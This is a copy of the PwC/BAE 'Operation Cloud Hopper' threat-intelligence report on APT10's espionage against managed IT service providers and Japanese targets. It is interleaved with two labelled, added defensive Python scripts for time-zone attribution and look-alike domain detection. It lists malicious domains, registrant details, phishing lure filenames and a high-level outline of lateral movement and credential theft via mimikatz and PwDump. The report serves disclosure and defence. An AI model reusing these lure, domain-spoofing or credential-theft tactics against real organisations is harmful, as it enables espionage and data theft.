Operation Cloud Hopper - PwC/BAE
Apr 6th, 2017
Operation Cloud Hopper
www.pwc.co.uk/cyber
Exposing a systematic hacking operation with an unprecedented web of global victims
April 2017
In collaboration with BAE Systems

Contents
Foreword 3
Executive summary 4
APT10 as a China-based threat actor 5
Motivations behind APT10’s targeting 14
Shining a light on APT10’s methodology 16
Conclusion 20
Appendices 21
Foreword

This report is an initial public release of research PwC UK and BAE Systems have conducted into new, sustained global campaigns by an established threat actor against managed IT service providers and their clients as well as several directly targeted organisations in Japan. Given the scale of those campaigns, the activity identified here is likely to reflect just a small portion of the threat actor’s operations.

This report is primarily fact-based. Where we have made an assessment this has been made clear by phraseology such as “we assess”, and the use of estimative language as outlined in Appendix A.

By publicly releasing this research, PwC UK and BAE Systems hope to facilitate broad awareness of the attack techniques used so that prevention and detection capabilities can be configured accordingly. It is also hoped that rapid progress can be made within the broader security community to further develop the understanding of the campaign techniques we outline, leading to additional public reports from peers across the security community.

As a part of our research and reporting effort, PwC UK and BAE Systems have collaborated with the UK’s National Cyber Security Centre (NCSC) under its Certified Incident Response (CIR) scheme to engage and notify managed IT service providers, known affected organisations and other national bodies.

Supplementary to this report, an Annex containing our technical analysis will be released.
Executive summary

Since late 2016, PwC UK and BAE Systems have been assisting victims of a new cyber espionage campaign conducted by a China-based threat actor. We assess this threat actor to almost certainly be the same as the threat actor widely known within the security community as ‘APT10’. The campaign, which we refer to as Operation Cloud Hopper, has targeted managed IT service providers (MSPs), allowing APT10 unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally. A number of Japanese organisations have also been directly targeted in a separate, simultaneous campaign by the same actor.

We have identified a number of key findings that are detailed below.

APT10 has recently unleashed a sustained campaign against MSPs. The compromise of MSP networks has provided broad and unprecedented access to MSP customer networks.
• Multiple MSPs were almost certainly being targeted from 2016 onwards, and it is likely that APT10 had already begun to do so from as early as 2014.
• MSP infrastructure has been used as part of a complex web of exfiltration routes spanning multiple victim networks.

APT10 has significantly increased its scale and capability since early 2016, including the addition of new custom tools.
• APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report, which comprehensively detailed the malware’s functionality and features, and its use by several China-based threat actors, including APT10.
• APT10 primarily used PlugX malware from 2014 to 2016, progressively improving and deploying newer versions, while simultaneously standardising their command and control function.
• We have observed a shift towards the use of bespoke malware as well as open-source tools, which have been customised to improve their functionality. This is highly likely to be indicative of an increase in sophistication.

Infrastructure observed in APT10’s most recent campaigns links to previous activities undertaken by the threat actor.
• The command and control infrastructure used for Operation Cloud Hopper is predominantly dynamic-DNS domains, which are highly interconnected and link to the threat actor’s previous operations. The number of dynamic-DNS domains in use by the threat actor has significantly increased since 2016, representative of an increase in operational tempo.
• Some top level domains used in the direct targeting of Japanese entities share common IP address space with the network of dynamic-DNS domains that we associate with Operation Cloud Hopper.

APT10 focuses on espionage activity, targeting intellectual property and other sensitive data.
• APT10 is known to have exfiltrated a high volume of data from multiple victims, exploiting compromised MSP networks, and those of their customers, to stealthily move this data around the world.
• The targeted nature of the exfiltration we have observed, along with the volume of the data, is reminiscent of the previous era of APT campaigns pre-2013.

PwC UK and BAE Systems assess APT10 as highly likely to be a China-based threat actor.
• It is a widely held view within the cyber security community that APT10 is a China-based threat actor.
• Our analysis of the compile times of malware binaries, the registration times of domains attributed to APT10, and the majority of its intrusion activity indicates a pattern of work in line with China Standard Time (UTC+8).
• The threat actor’s targeting of diplomatic and political organisations in response to geopolitical tensions, as well as the targeting of specific commercial enterprises, is closely aligned with strategic Chinese interests.
APT10 as a China-based threat actor

PwC UK and BAE Systems assess it is highly likely that APT10 is a China-based threat actor with a focus on espionage and wide ranging information collection. It has been in operation since at least 2009, and has evolved its targeting from an early focus on the US defence industrial base (DIB)[1] and the technology and telecommunications sector, to a widespread compromise of multiple industries and sectors across the globe, most recently with a focus on MSPs.

APT10, a name originally coined by FireEye, is also referred to as Red Apollo by PwC UK, CVNX by BAE Systems, Stone Panda by CrowdStrike, and menuPass Team more broadly in the public domain. The threat actor has previously been the subject of a range of open source reporting, including most notably a report by FireEye comprehensively detailing the threat actor’s use of the Poison Ivy malware family[2] and blog posts by Trend Micro[3] similarly detailing the use of EvilGrab malware.

Alongside the research and ongoing tracking of APT10 by both PwC UK and BAE’s Threat Intelligence teams, PwC UK’s Incident Response team has been engaged in supporting investigations linked to APT10 compromises. This research has contributed to the assessments and conclusions we have drawn regarding the recent campaign activity by APT10, which represents a shift from previous activities linked to the threat actor.

As a result of our analysis of APT10’s activities, we believe that it almost certainly benefits from significant staffing and logistical resources, which have increased over the last three years, with a significant step-change in 2016. Due to the scale of the threat actor’s operations throughout 2016 and 2017, we similarly assess it currently comprises multiple teams, each responsible for a different section of the day-to-day operations, namely domain registration, infrastructure management, malware development, target operations, and analysis.

APT10 withdrew from direct targeting using Poison Ivy in 2013 and conducted its first known retooling operation, upgrading its capabilities and replatforming to use PlugX. It is highly likely that this is due to the release of the 2013 FireEye report.

Our report will detail the most recent campaigns conducted by APT10, including the sustained targeting of MSPs, which we have named Operation Cloud Hopper, and the targeting of a number of Japanese institutions.

[1] The defence industrial base comprises the US Department of Defense and a plethora of companies that support the design, development and maintenance of defence assets and enable US military requirements to be met. https://www.dhs.gov/defense-industrial-base-sector
[2] https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf
[3] http://blog.trendmicro.com/trendlabs-security-intelligence/evilgrab-malware-family-used-in-targeted-attacks-in-asia/
Time-based analysis of APT10’s operations

As part of our analysis, we have made a number of observations about APT10 and its profile, which support our assessment that APT10 is a China-based threat actor. For example, we have identified patterns within the domain registrations and file compilation times associated with APT10 activity. This is almost certainly indicative of a threat actor based in the UTC+8 time zone, which aligns to Chinese Standard Time (CST).

Shown in Figure 1 are registration times[4], represented in UTC, for known APT10 top level domains since mid-2016, which mark a major uptick in APT10 activity.

Mapping this to UTC+8, as in Figure 2, shows a standard set of Chinese business hours, including a two-hour midday break.

Further analysis of the compile times of PlugX, RedLeaves and Quasar malware samples used by APT10 reveals a similar pattern in working hours, as shown in Figure 3.

Shifting this to UTC+8 shows a similar timeframe of operation to the domain registrations. There are some outliers, which are likely attributable to the operational nature of this threat actor, such as requirements to work outside normal business hours.

[4] The bubbles shown on Figures 1 through 6 are representative of the number of events observed at that time and date.

Figure 1: APT10 domain registration times in UTC (bubble plot; x-axis: Time of Day (UTC), 00:00 to 23:00; y-axis: Date (days), Aug 2016 to Apr 2017)
Figure 2: APT10 domain registration times in UTC+8 (bubble plot; x-axis: Time of Day (UTC+8), 00:00 to 23:00; y-axis: Date (days), Aug 2016 to Apr 2017)
Figure 3: Compile times of PlugX, RedLeaves and Quasar in UTC (bubble plot; x-axis: Time of Day (UTC), 00:00 to 23:00; y-axis: Date (days), Jul 2013 to Jul 2017)
Figure 4: Compile times of PlugX, RedLeaves and Quasar in UTC+8 (bubble plot; x-axis: Time of Day (UTC+8), 00:00 to 23:00; y-axis: Date (days), Jul 2013 to Jul 2017)
To further this analysis, we have observed the threat actor conducting interactive activities primarily between the hours of midnight and 10:00 UTC, as shown in Figure 7. When converting this to UTC+8 we again see a shift to Chinese business hours, with operations occurring between 08:00 and 19:00. It is a realistic probability that the weekend work observed in Figure 7 may be necessary as part of operational requirements.

The sum of this analysis aligns with the evidence provided by the United States Department of Justice indictment against several individuals associated with APT1,[5] another China-based threat actor, showing a working day starting at 08:00 UTC+8 and finishing at 18:00 UTC+8 with a two hour lunch break from 12:00 UTC+8 until 14:00 UTC+8.

When applying the time shift to the ChChes malware (newly used by APT10) compilation timestamps, we see a different pattern as shown in Figure 5. While this does not align with Chinese business hours, it is likely to be either a result of the threat actor changing its risk profile by attempting to obscure or confuse attribution or a developer’s side project that has ended up being used on targeted operations. Based on other technical overlaps, ChChes is highly likely to be exclusively used by APT10.

[5] https://www.justice.gov/iso/opa/resources/5122014519132358461949.pdf

Figure 5: Compile time of ChChes in UTC (bubble plot; x-axis: Time of Day (UTC), 00:00 to 23:00; y-axis: Date (days), Sep 22, 2016 to Dec 15, 2016)
Figure 6: Compile time of ChChes in UTC+8 (bubble plot; x-axis: Time of Day (UTC+8), 00:00 to 23:00; y-axis: Date (days), Sep 22, 2016 to Dec 15, 2016)
Figure 7: Operational times of APT10 in UTC+8 (heat map; x-axis: time of day, 00:00 to 23:00; y-axis: Mon, Tue, Wed, Thur, Fri, Sat, Sun; colour scale: Number of events 0, 1-10, 11-20, 21-30, 31-40, 41-50, 50+)
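The time-zone analysis behind Figures 1 to 7 can be reproduced on any set of UTC timestamps. The following script is an added example, not code from the PwC/BAE report: it shifts timestamps into a candidate zone, buckets them by hour and weekday as the figures do, checks for the 08:00 to 19:00 working day and two-hour midday break the text describes, and ranks all UTC offsets by fit. The timestamps are constructed for illustration and are not real APT10 compile or registration times.

```python
"""Working-hours analysis of attacker timestamps (added example, constructed data)."""
from collections import Counter
from datetime import datetime, timedelta, timezone
from typing import Iterable, List, Tuple

UTC = timezone.utc
CST = timezone(timedelta(hours=8))  # China Standard Time, UTC+8

# Constructed sample: compile / registration timestamps as recorded in UTC.
# These are NOT the report's data; they are shaped to illustrate the method.
SAMPLE_UTC = [
    "2016-09-05T01:12:00Z", "2016-09-05T02:40:00Z", "2016-09-06T03:05:00Z",
    "2016-09-07T00:30:00Z", "2016-09-07T01:55:00Z", "2016-09-08T02:20:00Z",
    "2016-09-08T06:10:00Z", "2016-09-09T07:45:00Z", "2016-09-12T08:30:00Z",
    "2016-09-12T09:50:00Z", "2016-09-13T06:35:00Z", "2016-09-14T07:15:00Z",
    "2016-09-14T10:30:00Z", "2016-09-15T03:40:00Z", "2016-09-16T09:20:00Z",
    "2016-09-17T15:00:00Z",  # a Saturday; 23:00 in UTC+8
]


def parse_utc(ts: str) -> datetime:
    """Parse an ISO-8601 timestamp ending in 'Z' into an aware UTC datetime."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00")).astimezone(UTC)


def hour_histogram(stamps: Iterable[datetime], tz: timezone) -> Counter:
    """Events per local hour-of-day once shifted into tz (the x-axis of Figures 1 to 6)."""
    return Counter(ts.astimezone(tz).hour for ts in stamps)


def weekday_hour_counts(stamps: Iterable[datetime], tz: timezone) -> Counter:
    """Events keyed by (weekday, hour) in tz: the layout of the Figure 7 heat map."""
    local = [ts.astimezone(tz) for ts in stamps]
    return Counter((t.weekday(), t.hour) for t in local)


def weekend_events(stamps: Iterable[datetime], tz: timezone) -> int:
    """Number of events that fall on Saturday or Sunday in tz."""
    return sum(1 for ts in stamps if ts.astimezone(tz).weekday() >= 5)


def business_hours_share(hist: Counter, start: int = 8, end: int = 19) -> float:
    """Fraction of events inside the [start, end) local working day."""
    total = sum(hist.values())
    if total == 0:
        return 0.0
    return sum(c for h, c in hist.items() if start <= h < end) / total


def midday_dip(hist: Counter, lunch: Tuple[int, int] = (12, 14)) -> bool:
    """Heuristic for the two-hour midday break: the lunch hours must be quieter than
    half the average of the surrounding blocks, and both blocks must show real
    activity (at least one event per hour on average), so an empty day never matches."""
    def avg(lo: int, hi: int) -> float:
        return sum(hist[h] for h in range(lo, hi)) / (hi - lo)
    morning, afternoon = avg(8, lunch[0]), avg(lunch[1], 19)
    return (morning >= 1 and afternoon >= 1
            and avg(*lunch) < 0.5 * min(morning, afternoon))


def score_timezones(stamps: List[datetime],
                    offsets: Iterable[int] = range(-12, 15)) -> List[Tuple[int, float]]:
    """Rank candidate UTC offsets by how much activity lands in a 08:00-19:00 day.
    One clear winner (here +8) is the signal the report relies on; a flat ranking
    means the data does not support a time-zone inference."""
    scores = [(off, business_hours_share(hour_histogram(stamps, timezone(timedelta(hours=off)))))
              for off in offsets]
    return sorted(scores, key=lambda s: (-s[1], s[0]))


if __name__ == "__main__":
    stamps = [parse_utc(s) for s in SAMPLE_UTC]
    for label, tz in (("UTC", UTC), ("UTC+8", CST)):
        hist = hour_histogram(stamps, tz)
        print(f"{label}: {business_hours_share(hist):.0%} in 08:00-19:00, "
              f"midday dip={midday_dip(hist)}, weekend events={weekend_events(stamps, tz)}")
    print("best-fit offsets:", score_timezones(stamps)[:3])
```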
Identifying a change in APT10’s targeting

APT10 has, in the past, primarily been known for its targeting of government and US defence industrial base organisations, with the earliest known date of its activity being in December 2009. Our research and observations suggest that this targeting continues to date.

During the 2013 to 2014 period there was a general downturn in the threat actor’s activities, as was also seen with other related groups. It was widely assessed that this was due to the public release of information surrounding APT1, which exposed its toolset and infrastructure.

From our analysis and investigations, we have identified APT10 as actively operating at least two specific campaigns, one targeting MSPs and their clients, and one directly targeting Japanese entities.

MSP focused campaign

APT10 has almost certainly been undertaking a global operation of unprecedented size and scale targeting a number of MSPs.

APT10 has vastly increased the scale and scope of its targeting to include multiple sectors, which has likely been facilitated by its compromise of MSPs. Such providers are responsible for the remote management of customer IT and end-user systems, thus they generally have unfettered and direct access to their clients’ networks. They may also store significant quantities of customer data on their own internal infrastructure.

MSPs therefore represent a high-payoff target for espionage-focused threat actors such as APT10. Given the level of client network access MSPs have, once APT10 has gained access to an MSP, it is likely to be relatively straightforward to exploit this and move laterally onto the networks of potentially thousands of other victims. This, in turn, would provide access to a larger amount of intellectual property and sensitive data. APT10 has been observed to exfiltrate stolen intellectual property via the MSPs, hence evading local network defences.

Other threat actors have previously been observed using a similar method of a supply chain attack, for example, in the compromise of Dutch certificate authority Diginotar in 2011[6] and the compromise of US retailer Target in 2013.[7]

The command and control (C2) infrastructure chosen by APT10 for Operation Cloud Hopper is predominantly referenced using dynamic-DNS domains. The various domains are highly interconnected through shared IP address hosting, even linking back historically to the threat actor’s much older operations.

At present, the indicators detailing APT10’s operations number into the thousands and cannot be easily visualised. The graph in Figure 8 overleaf depicts a high-level view of the infrastructure used by APT10 throughout 2016. As the campaign has progressed into 2017, the number of dynamic-DNS domains in use by the threat actor has significantly increased.

The graph in Figure 9, also shown overleaf, extracts one node of the newer C2 from the infrastructure shown in Figure 8 and maps this to the older infrastructure of APT10, as disclosed by FireEye in their 2014 Siesta Campaign blog post.[8] In terms of timing, it is highly likely that a single party is responsible for all of these domains, based on our observations of infrastructure overlap.

Through our investigations, we have identified multiple victims who have been infiltrated by the threat actor. Several of these provide enterprise services or cloud hosting, supporting our assessment that APT10 are almost certainly targeting MSPs. We believe that the observed targeting of MSPs is part of a widescale supply-chain attack.

[6] https://security.googleblog.com/2011/08/update-on-attempted-man-in-middle.html
[7] https://krebsonsecurity.com/2014/02/target-hackers-broke-in-via-hvac-company/
[8] https://www.fireeye.com/blog/threat-research/2014/03/a-detailed-examination-of-the-siesta-campaign.html

Figure 8: High-level view of infrastructure used by APT10 throughout 2016
Figure 9: Infrastructure graph linking early PlugX domains to recent APT10 domains
Sectors targeted: Business and Professional Services; Energy and Mining; Metals; Pharmaceuticals and Life Science; Public sector; Retail and Consumer; Technology; Industrial manufacturing; Engineering and Construction.

Countries targeted: India, Brazil, USA, Canada, Japan, South Korea, South Africa, Australia, Finland, Sweden, Norway, Switzerland, France, Thailand.
Japan focused campaign

In a separate series of operations, APT10 has been systematically targeting Japanese organisations using bespoke malware referred to in the public domain as ‘ChChes’. While linked to APT10 via shared infrastructure, this campaign exhibits some operational differences suggesting a potential sub-division within the threat actor. These operations have seen APT10 masquerading as legitimate Japanese public sector entities (such as the Ministry of Foreign Affairs, Japan International Cooperation Agency and the Liberal Democratic Party of Japan) to gain access to the victim organisations.

Targeting of these entities by APT10 is consistent with previous targeting by China-based threat actors of a wide range of industries and sectors in Japan. This includes the targeting of commercial companies and government agencies, both of which have resulted in the exfiltration of large amounts of data.[9]

APT10’s standard compromise methodology begins with a spear phishing email sent to the target, usually with an executable attachment designed to lure the victim to open it. Analysis of the filenames associated with some of the latest APT10 malware samples, particularly from late 2016, highlights the use of Japanese language filenames, which clearly indicates a campaign targeting Japanese-speaking individuals. Further analysis of these files can be found in Annex B.

Table 1 shows some example file names being used by APT10 in this campaign.

Table 1: Japanese language filenames used by APT10

Japanese filename | Translation
1102毎日新聞(回答)._exe | 1102 Mainichi Newspaper (answer)._exe
2016県立大学シンポジウムA4_1025.exe | 2016 Prefectural University Symposium A4_1025.exe
事務連絡案内状(28.11.07).exe | Business contact invitation (28.11.07).exe
個人番号の提供について.exe | Regarding provision of Individual number.exe
日米拡大抑止協議e | Japan-US expansion deterrence conference (e)
ロシア歴史協会の設立と「単一」国史教科書の作成.exe | Foundation of Russian historical association and Composing 「a unity」 state history textbook.exe

The following is an example of a malicious decoy document referencing Mitsubishi Heavy Industries:

Figure 10: Decoy document based on press release from Japanese firm Mitsubishi Heavy Industries detailing the unveiling of their new ABLASER-DUV (Deep Ultraviolet Laser)

[9] http://thediplomat.com/2016/04/japans-achilles-heel-cybersecurity/
A notable tactic of this APT10 subset is to register C2 domains that closely resemble legitimate Japanese organisations. Table 2 shows a selection of the spoofed domains registered, alongside the email addresses listed at registration and the legitimate impersonated domains.

Table 2: Domains observed being impersonated by APT10

Domain | Imitating | Theme | Description
bdoncloud[.]com | Unknown | Cloud | Generic Cloud theme
cloud-kingl[.]com | Unknown | Cloud | Generic Cloud theme
cloud-maste[.]com | Unknown | Cloud | Generic Cloud theme
incloud-go[.]com | Unknown | Cloud | Generic Cloud theme
incloud-obert[.]com | Unknown | Cloud | Generic Cloud theme
catholicmmb[.]com | cmmb.org | Religion | Catholic Medical Mission Board
ccfchrist[.]com | ccf.org.ph | Religion | Christ’s Commission Fellowship, based in Philippines
cwiinatonal[.]com | cwi.org.uk | Religion | Christian Witnesses to Israel
usffunicef[.]com | unicefusa.org | Charity | United States Fund For Unicef
salvaiona[.]com | salvationarmy.org | Charity | The Salvation Army
meiji-ac-jp[.]com | meiji.ac.jp | Japan / Academic | Meiji University in Japan
u-tokyo-ac-jp[.]com | u-tokyo.ac.jp | Japan / Academic | Tokyo University in Japan
jica-go-jp[.]bike | jica.go.jp | Japan / Public Sector | Japan International Cooperation Agency
jica-go-jp[.]biz | jica.go.jp | Japan / Public Sector | Japan International Cooperation Agency
jimin-jp[.]biz | jimin.jp | Japan / Public Sector | Liberal Democratic Party of Japan
mofa-go-jp[.]com | mofa.go.jp | Japan / Public Sector | Ministry of Foreign Affairs

The top level C2 domains observed in this campaign share a number of features that can be used to further identify affiliated nodes. Table 3, displaying registrant information, can be seen below:

Table 3: Known APT10 registration details showing a common name server

Domain | Registrant email | Name Server | Contact Name | Contact Street
belowto[.]com | robertorivera@india.com | ns1.ititch.com | Roberto Rivera | 904 Peck Street Manchester, NH 03103
ccfchrist[.]com | wenonatmcmurray@india.com | ns1.ititch.com | Wenona McMurray | 824 Ocala Street Winter Park, FL 32789
cloud-maste[.]com | meganfdelgado@india.com | ns1.ititch.com | Megan Delgado | 3328 Sigley Road Burlingame, KS 66413
poulsenv[.]com | abellonav.poulsen@yandex.com | ns1.ititch.com | Abellona Poulsen | 2187 Findley Avenue Carrington, ND 58421
unhamj[.]com | juanitardunham@india.com | ns1.ititch.com | Juanita Dunham | 745 Melody Lane Richmond, VA 23219
wthelpdesk[.]com | armandovalcala@india.com | ns1.ititch.com | Armando Alcala | 608 Irish Lane Madison, WI 53718
None of the domains share identical contact information other than stating that the respective registrants are based in the US. The contact streets, organisations, and names are all distinct between domains.

Some of the domains that do resolve share common IP address space with the network of dynamic-DNS domains that we associate with Operation Cloud Hopper as detailed earlier in the report. This connection is highlighted in the infrastructure graph shown in Figure 11 below, where some ChChes C2 domains can be seen in the bottom left, while on the far right are the older APT10 domains referenced in previous reporting.

Figure 11: Infrastructure graph linking early PlugX domains to recent ChChes domains
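Tables 2 and 3 describe two patterns a defender can check a newly registered domain feed against: a legitimate hostname re-spelled with hyphens under another TLD (meiji-ac-jp[.]com for meiji.ac.jp), and otherwise unrelated domains tied together by a shared name server and registrant e-mail provider. The script below is an added example, not code from the PwC/BAE report; the candidate domains and registration records are copied from those tables, while the `PROTECTED` watch list is an assumed defender-maintained input. The look-alike check also goes beyond the table's hyphenated form and catches the dots-simply-removed variant (meijiacjp.com), since the comparison ignores both separators.

```python
"""Look-alike domain detection and registration pivots (added example)."""
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Tuple

# Assumed defender watch list: legitimate domains whose impersonation we care about.
PROTECTED = ["meiji.ac.jp", "u-tokyo.ac.jp", "jica.go.jp", "jimin.jp", "mofa.go.jp"]

# Candidate domains in defanged form, as published in Table 2 of the report.
TABLE2_DOMAINS = ["bdoncloud[.]com", "cloud-maste[.]com", "meiji-ac-jp[.]com",
                  "u-tokyo-ac-jp[.]com", "jica-go-jp[.]bike", "jica-go-jp[.]biz",
                  "jimin-jp[.]biz", "mofa-go-jp[.]com"]

# Registration records from Table 3: (domain, registrant e-mail, name server).
TABLE3_WHOIS = [
    ("belowto[.]com", "robertorivera@india.com", "ns1.ititch.com"),
    ("ccfchrist[.]com", "wenonatmcmurray@india.com", "ns1.ititch.com"),
    ("cloud-maste[.]com", "meganfdelgado@india.com", "ns1.ititch.com"),
    ("poulsenv[.]com", "abellonav.poulsen@yandex.com", "ns1.ititch.com"),
    ("unhamj[.]com", "juanitardunham@india.com", "ns1.ititch.com"),
    ("wthelpdesk[.]com", "armandovalcala@india.com", "ns1.ititch.com"),
]


def refang(domain: str) -> str:
    """Turn the publication-safe 'example[.]com' form back into 'example.com'."""
    return domain.replace("[.]", ".").strip().lower()


def split_tld(domain: str) -> Tuple[str, str]:
    """Split 'jica-go-jp.bike' into ('jica-go-jp', 'bike'); the last label is the TLD."""
    label, _, tld = domain.rpartition(".")
    return label, tld


def _squash(name: str) -> str:
    """Drop both separators so 'meiji-ac-jp', 'meijiacjp' and 'meiji.ac.jp' compare equal."""
    return name.replace("-", "").replace(".", "")


def hyphenated_lookalike(candidate: str, protected: Iterable[str]) -> Optional[str]:
    """Return the protected domain that `candidate` imitates by folding its dotted
    labels into one registrable label, or None. The real domain never matches itself:
    'meiji.ac.jp' splits into label 'meiji.ac' plus TLD 'jp', and 'meijiac' != 'meijiacjp'."""
    label, _tld = split_tld(refang(candidate))
    for legit in protected:
        if _squash(label) == _squash(legit):
            return legit
    return None


def flag_lookalikes(candidates: Iterable[str],
                    protected: Iterable[str] = PROTECTED) -> Dict[str, str]:
    """Map each candidate that imitates a protected domain to the domain it imitates."""
    hits: Dict[str, str] = {}
    for raw in candidates:
        legit = hyphenated_lookalike(raw, protected)
        if legit:
            hits[refang(raw)] = legit
    return hits


def pivot_registrations(records: Iterable[Tuple[str, str, str]]) -> Dict[str, List[str]]:
    """Group domains by name server ('ns:') and by registrant mail host ('mailhost:'),
    the two features Table 3 shows in common across otherwise distinct registrants."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for domain, email, ns in records:
        groups[f"ns:{ns.lower()}"].append(refang(domain))
        groups[f"mailhost:{email.rsplit('@', 1)[-1].lower()}"].append(refang(domain))
    return dict(groups)


def shared_infrastructure(records: Iterable[Tuple[str, str, str]],
                          min_domains: int = 3) -> Dict[str, List[str]]:
    """Keep only pivots that tie at least `min_domains` domains together; a single
    yandex.com registrant is noise, six domains on one name server is a cluster."""
    return {k: v for k, v in pivot_registrations(records).items() if len(v) >= min_domains}


if __name__ == "__main__":
    for bad, legit in flag_lookalikes(TABLE2_DOMAINS).items():
        print(f"{bad:22} imitates {legit}")
    for pivot, domains in shared_infrastructure(TABLE3_WHOIS).items():
        print(f"{pivot}: {len(domains)} domains -> {', '.join(domains)}")
```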
Motivations behind APT10’s targeting

A short history of China-based hacking

China-based threat actors have a long history of cyber espionage in the traditional political, military and defensive arena, as well as industrial espionage for economic gain. Some of the most notable of these events from the past decade are shown below.

Figure 12: Timeline of China-based hacking activity (2006 to 2015)

2006-13: APT1 conducted a widespread cyber espionage campaign against hundreds of organisations spanning a number of sectors. Most victims primarily conducted their business in English and had a nexus with China’s strategic priorities.

2009: The Night Dragon campaign involved covert cyber attacks on global oil, energy and petrochemical companies and individuals in Kazakhstan, Taiwan, Greece and the US. The attackers used a number of vectors including social engineering and OS vulnerabilities to access proprietary operations and financial information.

2009: GhostNet is the alleged Chinese group responsible for running a global campaign starting in 2009 targeting foreign embassies and ministries, NGOs, news media institutions and Tibet-related organisations.

2009: Three medical device makers (Medtronic, Boston Scientific, St. Jude Medical) were allegedly compromised by Chinese actors. Although the motive is unclear, patient data was not thought to be stolen, making industrial espionage the most likely intention.

2010: Technology, financial and defence sectors were targeted by Operation Aurora, a campaign attributed to APT17/Aurora Panda. The list of targets included Google, who suffered the loss of intellectual property and attempted access to the Gmail accounts of human rights activists.

2010-12: Between 2010 and 2012 organisations in the energy and material manufacturing sectors were targeted. These included Westinghouse Electric, who had technical and design specifications for pipes, pipe supports and routing stolen in 2010. Additionally, emails of senior decision-makers involved in the business relationship with a Chinese state-owned enterprise were taken. In 2012, SolarWorld was compromised with attackers stealing sensitive business information relating to manufacturing metrics, and production line information and costs. It is thought to have been targeted strategically at a time when Chinese manufacturers of solar products were seeking to enter the US market at below fair value prices.

2013: Operation Iron Tiger is an attack campaign attributed to APT31, in which US government contractors were targeted in the areas of technology, telecommunications, energy and manufacturing.

2014: The data of 4.5 million members of US-based healthcare organisation Community Health Systems was potentially accessed during a breach attributed to APT18.

2014-15: The personal data of over 20 million people was compromised from the US Office of Personnel Management and attributed to China-based actors. This included Social Security numbers as well as security clearance and job applications for government positions.

2014-15: Several healthcare firms were targeted: Anthem, Premera Blue Cross and CareFirst all suffered data breaches in 2015. These were linked to APT19.
APT10 alignment with previous China-based hacking

Espionage attacks associated with China-based threat actors, as noted above, have traditionally targeted organisations that are of strategic value to Chinese businesses and where intellectual property obtained from such attacks could facilitate domestic growth or advancement.

There has been significant open source reporting which has documented the alignment between apparent information collection efforts of China-based threat actors and the strategic emerging industries documented in China’s Five Year Plan (FYP).10 The 13th FYP was released in March 2016 and the sectors and organisations known to be targeted by APT10 are broadly in line with the strategic aims documented in this plan. These aims outlined in the FYP will largely dictate the growth of businesses in China and are, therefore, likely to also form part of Chinese companies’ business strategies.

The latest FYP describes five principles which underpin China’s goal of doubling its 2010 GDP by 2020. At the forefront of these principles is innovation, largely focused around technological innovation, with China expected to invest 2.5% of GDP in research and development to attain technological advances, which are anticipated to contribute 60% towards economic growth objectives.11 The areas of innovation expected to receive extensive investment include next-generation communications, new energy, new materials, aerospace, biological medicine and smart manufacturing.

In addition to the FYP principle of innovation, China is also promoting ten key industries in which it wants to improve innovation in manufacturing as part of the ‘Made in China 2025’ initiative.12

Observed APT10 targeting is in line with many of the historic compromises we have outlined previously as originating from China. This targeting spans industries that align with China’s 13th FYP which would provide valuable information to advance the domestic innovation goals held within China. Given the broad spectrum of priority industries, the compromise of MSPs represents an efficient method of information collection. This strategy also provides additional obfuscation for the actor as any data exfiltrated is taken back through the initial compromised company’s systems, creating a much more difficult trail to follow.

10 https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
11 https://www.pwccn.com/en/migration/pdf/govt-work-review-mar2016.pdf
12 http://www.pwccn.com/en/migration/pdf/prosperity-masses-2020.pdf
Figure 13: Industries of interest outlined by ‘Made in China 2025’ initiative: agricultural machinery; next generation information technology; numeric control tools and robotics; aerospace equipment; ocean engineering equipment and high-tech ships; railway equipment; energy saving and new energy vehicles; power equipment; new materials; medicine and medical devices.
Shining a light on APT10’s methodology

This section details changes made to APT10 tools, techniques and procedures (TTPs) post-2014, following its shift from Poison Ivy to PlugX. These TTPs have been identified as part of our incident response and threat intelligence investigations and have been used in both of the recent campaigns we have encountered. The examples provided in this section will be drawn from both of those campaigns.

Reconnaissance and targeting

It is often difficult to identify the early stages of a threat actor’s preparation for an attack as these initial activities tend to occur below the line of visibility. Our analysis of the decoy documents most recently used by APT10 in its spear phishing campaigns, which are the primary delivery method of its payloads, indicates the actor performs a significant level of research on its targets. In line with commonly used APT actor methodologies, the threat actor aligns its decoy documents to a topic of interest relevant to the recipient.

In the example shown in Figure 14, an official document hosted on the Japan Society for the Promotion of Science website was weaponised and deployed as part of a spear phishing campaign against a Japanese target in the education sector.

Figure 14: Decoy document used by APT10 to target the Japanese education sector

APT10 has been known to use research from its reconnaissance to obtain company email addresses, and then craft a message containing either a malicious attachment or a link to a malicious site.
[Diagram: how APT10 hops from a targeted MSP to its customers and exfiltrates data. Stages shown, in sequence: APT10 compromises Managed IT Service Providers; MSP customers who align to APT10’s targeting profile are accessed by the threat actor using the MSP’s legitimate access; data of interest to APT10 is accessed by the threat actor moving laterally through systems; MSP customer data collected by APT10 is compressed, ready for exfiltration from the network; compressed files filled with stolen data are moved from the MSP customer’s network back onto the MSP network; APT10 exfiltrates stolen data back through MSPs to infrastructure controlled by the threat actor.]
As part of the same campaign, we have also observed an email sent by APT10,13 referencing a Scientific Research Grant Program, and targeting various Japanese education institutes including Meiji University14 and Chuo University.15 The email included a zip file containing a link to download a payload from one of APT10’s servers, the ChChes Powersploit exploit, detailed in Annex B.

13 http://csirt.ninja/?p=1103
14 http://www.meiji.ac.jp/isc/information/2016/6t5h7p00000mjbbr.html
15 http://www.chuo-u.ac.jp/research/rd/grant/news/2017/01/51783/

Initial compromise and lateral movement

Once on a target network, the actor rapidly deploys malware to establish a foothold, which may include one or more systems that provide sustained access to a victim’s network. As APT10 works to gain further privileges and access, it also conducts internal reconnaissance, mapping out the network using common Windows tools, and in later stages of the compromise using open source pentesting tools, detailed in Annex B.

This reconnaissance is run in parallel with the actor ensuring that it has access to legitimate credentials. We have observed that in cases where APT10 has infiltrated a target via an MSP, it continues to use the MSP’s credentials. In order to gain any further credentials, APT10 will usually deploy credential theft tools such as mimikatz or PwDump, sometimes loaded via DLL load order hijacking, to run against a domain controller, explained further in Annex B. Regular communications checks are then executed in order to maintain this level of access. In most cases, these stolen MSP credentials have provided administrator or domain administrator privileges.

